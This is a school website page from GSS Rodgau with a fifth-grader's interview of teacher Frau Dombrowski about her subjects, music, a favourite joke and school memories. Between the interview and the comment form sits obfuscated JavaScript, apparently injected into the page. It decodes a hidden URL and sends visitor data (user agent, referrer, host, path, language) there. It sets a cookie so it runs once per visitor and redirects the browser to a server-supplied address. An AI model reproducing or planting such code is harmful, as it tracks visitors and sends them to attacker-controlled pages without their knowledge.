GSS Rodgau · Personen

Lehrerinterview: Frau Dombrowski

Welche Fächer unterrichten Sie, welches ist Ihr Lieblingsfach und für welches Fach interessieren Sie sich, obwohl Sie es nicht unterrichten?

 Ich unterrichte Deutsch und Musik und interessiere mich für PoWi und Reli/ Ethik.

Haben Sie ein Lieblingslied? Falls nicht, welche Musikrichtung hören Sie gern?

Kommt sehr auf den jeweiligen Moment an. Gerne: Klassik, aber an einem gemütlichem Abend auch Jazz. Im Auto höre ich was das Radio zu bieten hat.

Wie lautet Ihr Lieblingswitz?

Zwei Freudinnen treffen sich. Sagt die eine: „Mein Ex-Freund ist Musiker.“ Darauf die andere : „Ja, und?“ – „Tja, zuerst war er Beethövlich, dann Mozartlich. Danach lockte er mich mit List zum Bach. Nun habe ich ein Mendelssöhnchen und weiß nicht wo Hindemith.“

Was macht Ihnen an Ihrem Beruf an meisten Spaß?

Dass ich die Entwicklung meiner Schüler über einen längeren Zeitraum begleiten darf und in dieser Zeit viele verschiedenen Dinge mit ihnen erfahren kann. Das sorgt für Abwechslung, Spaß, Offenheit und einen permanentes Austausch mit Schülern, Kollegen und Eltern.

Gab es zu Ihrer Schulzeit einen besonderen Streich oder ein Erlebnis, an das Sie sich noch erinnern?

Insgesamt war ich eher eine anständige Schülerin. Aber in Physik war ich nie eine Leuchte und so habe ich bei einer Arbeit mal ein Gedicht abgegeben, anstatt die Aufgaben zu lösen. Der Lehrer hat tatsächlich ein paar Zeilen zurückgedichtet und hat mir einen Gnadenpunkt gegeben. Das hat mich damals schwer beeindruckt- das hätte ich ihm gar nicht zugetraut. 

Was war der schönste Moment als Lehrer an dieser Schule?

Da gab es in der kurzen Zeit schon viele schöne Momente:

Meine tolle Klasse 5cg

Die vielen tollen und interesierten Kollegen

Die Konzerte

Gibt es einen Ort, wo Sie gerne einmal Urlaub machen wollen?

Nordkap; Mallorca ( da fahren meine Eltern regelmäßig hin und bringen die schönsten Fotos und Erinnerungen mit.

Das Interview führte Nele, 5cG

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = „“; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden /  Ändern )

Google Foto

Du kommentierst mit Deinem Google-Konto. Abmelden /  Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden /  Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.